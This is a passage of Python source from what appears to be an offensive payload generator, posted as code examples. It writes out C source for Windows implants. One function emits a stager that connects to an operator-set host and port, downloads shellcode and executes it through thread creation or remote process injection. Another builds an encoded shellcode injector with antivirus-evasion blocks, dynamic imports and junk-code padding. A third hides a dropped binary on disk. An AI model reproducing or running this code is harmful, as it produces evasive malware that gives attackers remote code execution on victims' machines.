        Ret_code += "FARPROC " + NdcWSACleanup + " = GetProcAddress(" + WS2_32 + ", \"WSACleanup\");\n"
        Ret_code += "if (" + NdcWSAStartup + "(" + Randversion + ", &" + Randwsadata + ") < 0){"
        Ret_code += NdcWSACleanup + "();exit(1);}\n"
    else:

        Ret_code += "if (WSAStartup(" + Randversion + ", &" + Randwsadata + ") < 0){\n"
        Ret_code += "WSACleanup();exit(1);}\n"

    Ret_code += "struct hostent * " + RandRevtarget + ";struct sockaddr_in " + Randsock + ";SOCKET " + RandSocket + ";\n"
    Ret_code += RandSocket + " = socket(AF_INET, SOCK_STREAM, 0);\n"

    if ModOpt["DynImport"] == True:

        Ret_code += "if (" + RandSocket + " == INVALID_SOCKET){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"

    Ret_code += RandRevtarget + " = gethostbyname(\"" + ModOpt[
        "Lhost"] + "\");\n"  #Lhost

    if ModOpt["DynImport"] == True:

        Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}\n"
    else:
        Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"

    Ret_code += "memcpy(&" + Randsock + ".sin_addr.s_addr, " + RandRevtarget + "->h_addr, " + RandRevtarget + "->h_length);\n"
    Ret_code += Randsock + ".sin_family = AF_INET;\n"
    Ret_code += Randsock + ".sin_port = htons((" + ModOpt[
        "Lport"] + "));\n"  #Lport
    Ret_code += "if ( connect(" + RandSocket + ", (struct sockaddr *)&" + Randsock + ", sizeof(" + Randsock + ")) ){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
    Ret_code += "char " + Randbuff + "[400] = \"GET /" + UriGenerator(
    ) + " HTTP/1.1\\r\\nHost: " + Lhost + ":" + Lport + "\\r\\nConnection: Keep-Alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\\r\\n\\r\\n\";\n"
    Ret_code += "send(" + RandSocket + "," + Randbuff + ", strlen( " + Randbuff + " ),0);\n"
    Ret_code += "Sleep(300);\n"

    Ret_code += inject_utils.Win_MemLocal(ModOpt)

    Ret_code += "char * " + Randpointer2 + " = " + Randlpv + ";\n"
    Ret_code += "int " + RandRecv_int + ";\n"
    Ret_code += "do {" + RandRecv_int + " = recv(" + RandSocket + ", " + Randpointer2 + ", 1024, 0);\n"
    Ret_code += "" + Randpointer2 + " += " + RandRecv_int + ";\n"
    Ret_code += "}while ( " + RandRecv_int + " > 0 );\n"

    if ModOpt["DynImport"] == True:

        Ret_code += "closesocket(" + RandSocket + ");" + NdcWSACleanup + "();\n"

    else:
        Ret_code += "closesocket(" + RandSocket + ");WSACleanup();\n"

    if "RW/" in MemAlloc and ExecMethod == "Thread":

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    Ret_code += Randlpv + " = strstr(" + Randlpv + ", \"\\r\\n\\r\\n\") + 4;\n"

    if ModOpt["ExecMethod"] == "Thread":

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
Beispiel #13
0
def ShellInject_C_windows(ModOpt):

    Randbufname = varname_creator()
    Randlpv = varname_creator()
    Randhand = varname_creator()
    Randresult = varname_creator()
    Randthread = varname_creator()
    Oldprot = varname_creator()
    Randbool = varname_creator()
    Ndcvirtualpro = varname_creator()
    ResThread = varname_creator()

    Payload = ModOpt["Payload"]
    Encryption = ModOpt["Encode"]
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]
    ModOpt["Buff"] = Randbufname
    ModOpt["Lpvoid"] = Randlpv
    #ModOpt["Lpvoid2"] = varname_creator()

    #if ModOpt["ExecMethod"] not in Remote_methods or ModOpt["MemAlloc"] in ["SharedSection","SS"]:

    if ExecMethod not in Remote_methods: #["EntryPointHijack","EPH","EarlyBird","EB"]:

        DecodeKit = EncryptionManager(Encryption,Payload,Randbufname,Randlpv)
    else:
        DecodeKit = EncryptionManager(Encryption,Payload,Randbufname)        

    ModOpt["Payload"] = DecodeKit[0] # encoded shellcode 
    ModOpt["Decoder"] = DecodeKit[1] # decoder stub or string = False if decoder is not necessary

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)
    Ret_code += "#include <tlhelp32.h>\n"
    
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"
        
        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += inject_utils.ShellcodeHelper(ModOpt)

    if ModOpt["ExecMethod"] not in Remote_methods:

        Ret_code += "unsigned char * " + Randlpv + ";\n" 
        Ret_code += inject_utils.Win_MemLocal(ModOpt)

        if ModOpt["DynImport"] == True:
        
             Ndcrtlmovemem = varname_creator() 
             Ret_code += "FARPROC " + Ndcrtlmovemem + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"RtlMoveMemory\");\n"
             Ret_code += Ndcrtlmovemem + "(" + Randlpv + "," + Randbufname + "," + ModOpt["Bufflen"] + ");\n"
        else:
             Ret_code += "RtlMoveMemory(" + Randlpv + "," + Randbufname + "," + ModOpt["Bufflen"] + ");\n"

        if ModOpt["Decoder"] != "False":

            Ret_code += ModOpt["Decoder"]

        if "RW/" in MemAlloc and ExecMethod in ["Thread","APC"]:

            Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        #ModOpt["Lpvoid"] = ModOpt["Buff"]
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
Beispiel #14
0
def Postex_C_SetFileAttributeHidden_windows(ModOpt):

    RandCounter = varname_creator()
    RandAttr = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "DWORD " + RandAttr + " = GetFileAttributes(\"" + ModOpt[
        "Binpath"] + "\");\n"
    Ret_code += "SetFileAttributes(\"" + ModOpt[
        "Binpath"] + "\"," + RandAttr + " + FILE_ATTRIBUTE_HIDDEN);\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)